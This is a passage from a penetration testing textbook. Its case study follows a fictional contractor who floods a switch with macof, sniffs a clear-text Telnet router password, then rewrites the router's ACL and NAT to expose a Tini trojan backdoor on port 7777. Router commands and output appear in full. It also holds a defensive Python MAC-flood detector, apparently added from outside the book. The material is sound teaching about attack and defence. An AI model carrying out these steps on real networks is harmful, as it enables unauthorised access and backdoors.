Case Study


In this case study, Evil Jimmy is a contractor for a fictitious company called Little Company Network (LCN). At LCN, Evil Jimmy wants to be able to access the network from home. He has installed the Trojan Tini on a server that operates on TCP port 7777, but the router is not allowing traffic on that port to pass through into the network. Evil Jimmy realizes that he must gain access to the router and change the ACL so that port 7777 is allowed through the router. Also, he must configure a static NAT configuration so that he can access his PC from outside the LCN network. Figure 10-8 shows a network diagram of the LCN network.

Figure 10-8. LCN Network


Note

For more on Tini and other Trojans, see Chapter 12, "Using Trojans and Backdoor Applications."


Evil Jimmy knows that to gain access to the router, he must get the password. He knows that the network administrator frequently Telnets into the router. Because Telnet sends everything, including passwords, in clear text, all Evil Jimmy has to do is sniff the traffic to see the password.

Unfortunately for Evil Jimmy, he cannot just turn on a network monitor application and capture the password because a switch is in use. To see the traffic going to the router, he first floods the switch with MAC addresses. By filling up the MAC table, he forces the switch to send traffic out all ports. With traffic being sent out all ports, Evil Jimmy can sniff the Telnet traffic going to the router.

Evil Jimmy launches macof from a Linux command line to flood the switch with MAC addresses. Figure 10-9 shows macof in action as thousands of MAC addresses are sent to the switch.

Figure 10-9. Macof Flooding
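From the defender's side, the flood that macof produces has an obvious signature: one switch port suddenly learns hundreds of distinct source MAC addresses in a few seconds, whereas an access port normally carries one or two. The following Python script is an added example, not code from the book or from the macof tool; it simulates the per-port MAC-learning events a switch sees (the event data is constructed, the port names, thresholds and the 02:... locally administered MAC prefix are the example's own assumptions) and raises an alert when the number of distinct source MACs seen on a port within a sliding window exceeds a limit, which is the same check that switch port security enforces in hardware.

```python
from collections import Counter, defaultdict, deque


def build_sample_events():
    """Constructed MAC-learning events: (timestamp seconds, ingress port, source MAC).

    Illustrative data only, not a capture from the LCN network. Two ports carry
    normal hosts; Fa0/5 receives a burst of forged source MACs like a flooding
    tool generates in order to fill the CAM table.
    """
    events = []
    for i in range(60):
        # One workstation on Fa0/1, two workstations alternating on Fa0/2.
        events.append((float(i), "Fa0/1", "00:11:22:33:44:01"))
        events.append((float(i), "Fa0/2", "00:11:22:33:44:%02x" % (2 + i % 2)))
    for i in range(200):
        # 200 distinct locally administered (02:...) source MACs within two seconds.
        events.append((50.0 + i * 0.01, "Fa0/5", "02:00:00:00:%02x:%02x" % (i // 256, i % 256)))
    return events


def detect_mac_flood(events, window_s=10.0, max_macs=20):
    """Sliding-window cardinality check per port.

    Returns (alerts, peak): alerts is a list of (port, timestamp, distinct_macs)
    raised the first time a port exceeds max_macs distinct source MACs within
    window_s seconds; peak maps each port to the highest count observed.
    """
    window = defaultdict(deque)    # port -> deque of (t, mac) still inside the window
    counts = defaultdict(Counter)  # port -> occurrences of each mac inside the window
    peak = defaultdict(int)
    alerts = []
    alerted = set()
    for t, port, mac in sorted(events):
        q, c = window[port], counts[port]
        q.append((t, mac))
        c[mac] += 1
        # Drop events that have aged out of the window and forget MACs that vanished.
        while q and t - q[0][0] > window_s:
            old_t, old_mac = q.popleft()
            c[old_mac] -= 1
            if c[old_mac] == 0:
                del c[old_mac]
        distinct = len(c)
        peak[port] = max(peak[port], distinct)
        if distinct > max_macs and port not in alerted:
            alerted.add(port)
            alerts.append((port, t, distinct))
    return alerts, dict(peak)


def main():
    alerts, peak = detect_mac_flood(build_sample_events())
    for port, t, distinct in alerts:
        print(f"ALERT {port}: {distinct} distinct source MACs inside the window at t={t:.2f}s")
    print("peak distinct source MACs per port:", peak)


if __name__ == "__main__":
    main()
```

The threshold plays the role of the port-security maximum on a real switch: once a port learns more addresses than a workstation could plausibly own, the frames are being forged. Running the sample alerts only for Fa0/5, because the legitimate ports never exceed two distinct addresses however long the window is.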


Now Evil Jimmy sits back and monitors the traffic using Ethereal, a free network monitor utility. After a while, he notices Telnet traffic to the router (192.168.100.12). Ethereal reveals the output shown in Figure 10-10, which shows the Telnet password and enable password as LCN123.

Figure 10-10. LCN Network Telnet/Enable Password Compromised


Next, Evil Jimmy uses these passwords to log onto the router and examine the current access lists on the outgoing interface, serial 0, as demonstrated in Example 10-5. (Relevant portions are highlighted.)

Example 10-5. Evil Jimmy Dissects the Access Lists
C:\>telnet 192.168.100.12
Authorized Use Only
User Access Verification

Password:
LCNRouter>enable
Password:
LCNRouter#show access-lists
Standard IP access list INSIDE_LOCAL
    permit 192.168.100.0
Extended IP access list 100
    permit tcp any any eq smtp
    permit tcp any any eq domain
    permit tcp any any eq www
    permit tcp any any eq 443
    permit tcp any any eq ftp-data
    permit tcp any any eq ftp
LCNRouter#show ip interface serial 0
Serial0 is administratively down, line protocol is down
  Internet address is 200.100.50.25/24
  Broadcast address is 255.255.255.255
  Address determined by setup command
  MTU is 1500 bytes
  Helper address is not set
  Directed broadcast forwarding is disabled
  Outgoing access list is not set
  Inbound access list is 100
...<output omitted for brevity>...

Evil Jimmy sees that access-list 100 is used on the serial 0 interface to filter traffic coming inbound. He adds a line to this access list so that TCP port 7777, the port used by the Tini backdoor Trojan, is also allowed through, as demonstrated in Example 10-6.

Example 10-6. Evil Jimmy Modifies the Access List to Permit His Trojan
LCNRouter#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
LCNRouter(config)#access-list 100 permit tcp any any eq 7777

Next, Evil Jimmy needs to change the NAT configuration. Currently, the router is using dynamic NAT to translate the entire 192.168.100.0/24 network to the global pool of 200.100.50.26 through 200.100.50.30. The problem that Evil Jimmy faces is that he cannot predict which destination address he should use from home to reach his computer on the inside of the LCN network. He needs to configure a static NAT translation for his computer, while leaving dynamic NAT in place for the rest of the network.

First, Evil Jimmy looks at the existing configuration, as displayed in Example 10-7. (Only the relevant portions are shown.)

Example 10-7. Reconnaissance on the LCN NAT Configuration
interface Ethernet0
 ip address 192.168.100.12 255.255.255.0
 ip nat inside
!
interface Serial0
 ip address 200.100.50.25 255.255.255.0
 ip access-group 100 in
 ip nat outside
 no fair-queue
!
ip nat pool LCNPool 200.100.50.26 200.100.50.30 prefix-length 24
ip nat inside source list INSIDE_LOCAL pool LCNPool overload
ip classless
ip access-list standard INSIDE_LOCAL
 permit 192.168.100.0

Evil Jimmy configures a static NAT translation for his computer (192.168.100.150). He makes sure to modify the existing inside source list called INSIDE_LOCAL to deny his computer; this prevents his computer from being used for dynamic NAT. He translates his inside local address to the public address of 200.100.50.26 and changes the inside global pool called LCNPool to no longer use the address of 200.100.50.26, as demonstrated in Example 10-8.

Example 10-8. Evil Jimmy Configures a Static NAT Translation to Provide Remote Access to the LCN Network
LCNRouter(config)#ip access-list standard INSIDE_LOCAL
! First remove the existing statement
LCNRouter(config-std-nacl)#no permit 192.168.100.0
! Deny Evil Jimmy's computer from being used in the dynamic NAT configuration
LCNRouter(config-std-nacl)#deny host 192.168.100.150
! Add the rest of the network again so that it will be used in the dynamic NAT configuration
LCNRouter(config-std-nacl)#permit 192.168.100.0
LCNRouter(config-std-nacl)#exit
! Configure static NAT
LCNRouter(config)#ip nat inside source static 192.168.100.150 200.100.50.26
! Change the current pool to no longer use the 200.100.50.26 address
LCNRouter(config)#no ip nat pool LCNPool
LCNRouter(config)#ip nat pool LCNPool 200.100.50.27 200.100.50.30 prefix-length 24

Tip

This case study assumes a working knowledge of configuring Network Address Translation (NAT). For more information on configuring NAT, see the Cisco Technical Support and Documentation website on the subject at http://www.cisco.com/en/US/tech/tk648/tk361/tk438/tsd_technology_support_sub-protocol_home.html.


That night, Evil Jimmy tries to access his computer from home. From an MS-DOS command shell, he Telnets to TCP port 7777, the port used by the Tini Trojan:

C:\>telnet 200.100.50.26 7777
Connecting To 200.100.50.26...
C:\>

It worked! A failure would have reported a Connection Failed message; instead, he is presented with a command prompt on his computer within the LCN network. Evil Jimmy has successfully created a means to remotely access the inside of the LCN network.



Penetration Testing and Network Defense
ISBN: 1587052083
Year: 2005
Pages: 209